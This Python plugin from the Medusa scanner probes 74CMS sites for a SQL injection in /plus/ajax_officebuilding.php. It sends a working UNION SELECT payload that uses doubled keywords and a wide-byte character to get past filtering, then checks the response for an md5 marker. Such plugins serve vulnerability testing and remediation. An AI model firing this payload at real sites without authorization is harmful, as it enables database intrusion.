#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
__date__ = '2019/10/11 16:39 PM'
import requests
from ClassCongregation import VulnerabilityDetails,WriteFile,ErrorLog,ErrorHandling

class VulnerabilityInfo(object):
    """Static description of the finding this plugin reports.

    The record is exposed as ``self.info``, a plain dict whose ``details``
    entry carries the scan result text handed in by the caller.
    """

    def __init__(self, Medusa):
        """Build the ``info`` dict; *Medusa* is stored unchanged under ``details``."""
        self.info = {
            # "0" when there is no CVE or CNVD number; a CVE number takes
            # priority over a CNVD one.
            'number': "0",
            # Plugin author.
            'author': "Ascotbe",
            # Date the plugin was last edited.
            'create_date': "2020-1-6",
            # Vulnerability disclosure date; use the plugin's writing date
            # when the real one is unknown.
            'disclosure': '2014-09-03',
            # Plugin name.
            'algroup': "74CMSSQLInjectionVulnerabilityExists",
            # Vulnerability name ("SQL injection vulnerability in 74CMS").
            'name': '74CMS存在SQL注入漏洞',
            # Affected component.
            'affects': "74CMS",
            # Description: the /plus/ajax_officebuilding.php file of 74CMS
            # has a SQL injection vulnerability.
            'desc_content': "骑士CMS/plus/ajax_officebuilding.php文件存在SQL注入漏洞",
            # Severity ("high risk").
            'rank': "高危",
            # Remediation advice ("upgrade to the latest release").
            'suggest': "升级最新的系统",
            # Affected version.
            'version': "V3.4.20140530",
            # Scan result supplied by the caller.
            'details': Medusa,
        }

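def medusa(**kwargs)->None:
    """Check one target for the 74CMS ajax_officebuilding.php SQL injection.

    A single GET request is sent to ``Url`` with the probe appended, and the
    response body is searched for a fixed marker string. When the marker is
    present the finding is recorded through ``VulnerabilityDetails(...).Write()``
    and ``WriteFile().result(...)``. The recorded finding embeds the full
    response body, so result files may contain data returned by the target.

    Defenders can recognise this check in web-server logs as requests to
    ``/plus/ajax_officebuilding.php`` with ``act=key``; the plugin's own
    remediation advice is to upgrade the affected 74CMS release.

    Keyword Args:
        Url: Base URL of the target; the probe path is appended to it as is.
        Headers: Mapping of request headers. It is copied, never modified.
        Proxies: Proxy mapping passed straight to ``requests.get``.

    Returns:
        None. Results and errors are reported only through the project's
        writer and logger classes.
    """
    url = kwargs.get("Url")
    proxies = kwargs.get("Proxies")

    try:
        payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
        payload_url = url + payload

        # Copy the headers so the two overrides below do not leak into the
        # caller's mapping, and tolerate a missing "Headers" argument.
        headers = dict(kwargs.get("Headers") or {})
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        # NOTE(review): verify=False turns off TLS certificate validation, so
        # the responding server is not authenticated - confirm this is the
        # intended policy for scan traffic.
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        # The marker is presumably the MD5 digest of the number embedded in
        # the probe (TODO confirm); the probe itself only contains the md5()
        # call, so a page that merely echoes the request cannot match.
        if '3438d5e3ead84b2effc5ec33ed1239f5' in con:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t = VulnerabilityInfo(Medusa)
            # Pass the URL and the scanned data to the result writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Write to file: url is the target file name, Medusa the result.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # str(url) keeps the handler from raising a second TypeError when
        # "Url" was not supplied, which would hide the original error.
        ErrorLog().Write("Plugin Name:"+plugin_name+" || Target Url:"+str(url), e)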
